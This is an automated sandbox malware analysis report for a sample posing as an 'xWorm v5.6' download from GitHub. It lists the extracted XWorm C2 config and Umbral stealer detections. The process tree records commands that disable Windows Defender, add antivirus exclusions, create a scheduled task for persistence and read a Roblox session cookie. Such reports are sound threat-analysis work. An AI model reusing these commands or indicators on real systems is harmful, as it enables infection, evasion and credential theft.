Overview

overview

10

Static

static

1

URLScan

urlscan

https://github.com/3...

windows10-2004-x64

10

Analysis

  • max time kernel
    54s
  • max time network
    55s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/09/2024, 14:59 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://github.com/3z02/Dont-/raw/main/xWorm+v5.6.exe

Score
10/10
umbralxwormcredential_accessdiscoveryexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

japanese-longer.gl.at.ply.gg:28461

Mutex

MDePCKGcpJNC9Aji

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

aes.plain
1
pc7TfCwrgO/afVvvjLrS8g==

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/3z02/Dont-/raw/main/xWorm+v5.6.exe
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:392
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde23f46f8,0x7ffde23f4708,0x7ffde23f4718
      2⤵
        PID:3000
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
        2⤵
          PID:2056
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:824
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2944 /prefetch:8
          2⤵
            PID:3816
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
            2⤵
              PID:1880
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
              2⤵
                PID:3604
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:8
                2⤵
                  PID:2328
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5408 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4236
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
                  2⤵
                    PID:2088
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
                    2⤵
                      PID:4816
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5740 /prefetch:8
                      2⤵
                        PID:4248
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
                        2⤵
                          PID:4416
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
                          2⤵
                            PID:4244
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:1
                            2⤵
                              PID:2532
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5508 /prefetch:8
                              2⤵
                                PID:2704
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,4163062131641469542,15099684809572404467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2612 /prefetch:8
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3900
                              • C:\Users\Admin\Downloads\xWorm+v5.6.exe
                                "C:\Users\Admin\Downloads\xWorm+v5.6.exe"
                                2⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                PID:5176
                                • C:\Users\Admin\AppData\Local\Temp\Cloner.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Cloner.exe"
                                  3⤵
                                  • Checks computer location settings
                                  • Drops startup file
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of SetWindowsHookEx
                                  PID:5768
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Cloner.exe'
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2548
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Cloner.exe'
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5012
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4020
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5756
                                  • C:\Windows\System32\schtasks.exe
                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
                                    4⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2044
                                • C:\Users\Admin\AppData\Local\Temp\Grabb.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Grabb.exe"
                                  3⤵
                                  • Drops file in Drivers directory
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5816
                                  • C:\Windows\System32\Wbem\wmic.exe
                                    "wmic.exe" csproduct get uuid
                                    4⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5956
                                  • C:\Windows\SYSTEM32\attrib.exe
                                    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Grabb.exe"
                                    4⤵
                                    • Views/modifies file attributes
                                    PID:6024
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Grabb.exe'
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6072
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4712
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1616
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2392
                                  • C:\Windows\System32\Wbem\wmic.exe
                                    "wmic.exe" os get Caption
                                    4⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4888
                                  • C:\Windows\System32\Wbem\wmic.exe
                                    "wmic.exe" computersystem get totalphysicalmemory
                                    4⤵
                                      PID:5864
                                    • C:\Windows\System32\Wbem\wmic.exe
                                      "wmic.exe" csproduct get uuid
                                      4⤵
                                        PID:6064
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                        4⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4492
                                      • C:\Windows\System32\Wbem\wmic.exe
                                        "wmic" path win32_VideoController get name
                                        4⤵
                                        • Detects videocard installed
                                        PID:1076
                                      • C:\Windows\SYSTEM32\cmd.exe
                                        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Grabb.exe" && pause
                                        4⤵
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        PID:740
                                        • C:\Windows\system32\PING.EXE
                                          ping localhost
                                          5⤵
                                          • System Network Configuration Discovery: Internet Connection Discovery
                                          • Runs ping.exe
                                          PID:5404
                                • C:\Windows\System32\CompPkgSrv.exe
                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                  1⤵
                                    PID:5016
                                  • C:\Windows\System32\CompPkgSrv.exe
                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                    1⤵
                                      PID:3920
                                    • C:\Windows\system32\taskmgr.exe
                                      "C:\Windows\system32\taskmgr.exe" /4
                                      1⤵
                                      • Checks SCSI registry key(s)
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:5628

                                    Network

                                    • flag-us
                                      DNS
                                      8.8.8.8.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      8.8.8.8.in-addr.arpa
                                      IN PTR
                                      Response
                                      8.8.8.8.in-addr.arpa
                                      IN PTR
                                      dnsgoogle
                                    • flag-us
                                      DNS
                                      217.106.137.52.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      217.106.137.52.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      github.com
                                      msedge.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      github.com
                                      IN A
                                      Response
                                      github.com
                                      IN A
                                      20.26.156.215
                                    • flag-gb
                                      GET
                                      https://github.com/3z02/Dont-/raw/main/xWorm+v5.6.exe
                                      msedge.exe
                                      Remote address:
                                      20.26.156.215:443
                                      Request
                                      GET /3z02/Dont-/raw/main/xWorm+v5.6.exe HTTP/2.0
                                      host: github.com
                                      sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                      sec-ch-ua-mobile: ?0
                                      dnt: 1
                                      upgrade-insecure-requests: 1
                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                      sec-fetch-site: none
                                      sec-fetch-mode: navigate
                                      sec-fetch-user: ?1
                                      sec-fetch-dest: document
                                      accept-encoding: gzip, deflate, br
                                      accept-language: en-US,en;q=0.9
                                      Response
                                      HTTP/2.0 302
                                      server: GitHub.com
                                      date: Fri, 06 Sep 2024 15:00:51 GMT
                                      content-type: text/html; charset=utf-8
                                      vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                      access-control-allow-origin:
                                      location: https://raw.githubusercontent.com/3z02/Dont-/main/xWorm%2Bv5.6.exe
                                      cache-control: no-cache
                                      strict-transport-security: max-age=31536000; includeSubdomains; preload
                                      x-frame-options: deny
                                      x-content-type-options: nosniff
                                      x-xss-protection: 0
                                      referrer-policy: no-referrer-when-downgrade
                                      content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                      content-length: 0
                                      x-github-request-id: EA40:14F9E:3D003DB:4486729:66DB1922
                                    • flag-us
                                      DNS
                                      raw.githubusercontent.com
                                      msedge.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      raw.githubusercontent.com
                                      IN A
                                      Response
                                      raw.githubusercontent.com
                                      IN A
                                      185.199.109.133
                                      raw.githubusercontent.com
                                      IN A
                                      185.199.110.133
                                      raw.githubusercontent.com
                                      IN A
                                      185.199.111.133
                                      raw.githubusercontent.com
                                      IN A
                                      185.199.108.133
                                    • flag-us
                                      GET
                                      https://raw.githubusercontent.com/3z02/Dont-/main/xWorm%2Bv5.6.exe
                                      msedge.exe
                                      Remote address:
                                      185.199.109.133:443
                                      Request
                                      GET /3z02/Dont-/main/xWorm%2Bv5.6.exe HTTP/2.0
                                      host: raw.githubusercontent.com
                                      dnt: 1
                                      upgrade-insecure-requests: 1
                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                      sec-fetch-site: none
                                      sec-fetch-mode: navigate
                                      sec-fetch-user: ?1
                                      sec-fetch-dest: document
                                      sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
                                      sec-ch-ua-mobile: ?0
                                      accept-encoding: gzip, deflate, br
                                      accept-language: en-US,en;q=0.9
                                      Response
                                      HTTP/2.0 200
                                      cache-control: max-age=300
                                      content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                      content-type: application/octet-stream
                                      etag: W/"1a1d58d7f4eff9bd744ec6bebab368924489e2f368988c1bea88ae9393dda613"
                                      strict-transport-security: max-age=31536000
                                      x-content-type-options: nosniff
                                      x-frame-options: deny
                                      x-xss-protection: 1; mode=block
                                      x-github-request-id: 5B07:143B1A:8299F3:9FB431:66DB1921
                                      accept-ranges: bytes
                                      date: Fri, 06 Sep 2024 15:00:51 GMT
                                      via: 1.1 varnish
                                      x-served-by: cache-lon420145-LON
                                      x-cache: MISS
                                      x-cache-hits: 0
                                      x-timer: S1725634851.443823,VS0,VE518
                                      vary: Authorization,Accept-Encoding,Origin
                                      access-control-allow-origin: *
                                      cross-origin-resource-policy: cross-origin
                                      x-fastly-request-id: ab67e362a719ac283748f88d07019c775d849050
                                      expires: Fri, 06 Sep 2024 15:05:51 GMT
                                      source-age: 0
                                      content-length: 12582912
                                    • flag-us
                                      DNS
                                      215.156.26.20.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      215.156.26.20.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      34.56.20.217.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      34.56.20.217.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      95.221.229.192.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      95.221.229.192.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      22.160.190.20.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      22.160.190.20.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      133.109.199.185.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      133.109.199.185.in-addr.arpa
                                      IN PTR
                                      Response
                                      133.109.199.185.in-addr.arpa
                                      IN PTR
                                      cdn-185-199-109-133githubcom
                                    • flag-us
                                      DNS
                                      241.150.49.20.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      241.150.49.20.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      gstatic.com
                                      Grabb.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      gstatic.com
                                      IN A
                                      Response
                                      gstatic.com
                                      IN A
                                      142.250.102.94
                                      gstatic.com
                                      IN A
                                      142.250.102.120
                                    • flag-nl
                                      GET
                                      https://gstatic.com/generate_204
                                      Grabb.exe
                                      Remote address:
                                      142.250.102.94:443
                                      Request
                                      GET /generate_204 HTTP/1.1
                                      Host: gstatic.com
                                      Connection: Keep-Alive
                                      Response
                                      HTTP/1.1 204 No Content
                                      Content-Length: 0
                                      Cross-Origin-Resource-Policy: cross-origin
                                      Date: Fri, 06 Sep 2024 15:01:08 GMT
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    • flag-us
                                      DNS
                                      ip-api.com
                                      Grabb.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      ip-api.com
                                      IN A
                                      Response
                                      ip-api.com
                                      IN A
                                      208.95.112.1
                                    • flag-us
                                      GET
                                      http://ip-api.com/line/?fields=hosting
                                      Grabb.exe
                                      Remote address:
                                      208.95.112.1:80
                                      Request
                                      GET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Response
                                      HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 15:01:07 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 6
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                    • flag-us
                                      DNS
                                      94.102.250.142.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      94.102.250.142.in-addr.arpa
                                      IN PTR
                                      Response
                                      94.102.250.142.in-addr.arpa
                                      IN PTR
                                      rb-in-f941e100net
                                    • flag-us
                                      DNS
                                      1.112.95.208.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      1.112.95.208.in-addr.arpa
                                      IN PTR
                                      Response
                                      1.112.95.208.in-addr.arpa
                                      IN PTR
                                      ip-apicom
                                    • flag-us
                                      GET
                                      http://ip-api.com/json/?fields=225545
                                      Grabb.exe
                                      Remote address:
                                      208.95.112.1:80
                                      Request
                                      GET /json/?fields=225545 HTTP/1.1
                                      Host: ip-api.com
                                      Response
                                      HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 15:01:11 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 161
                                      Access-Control-Allow-Origin: *
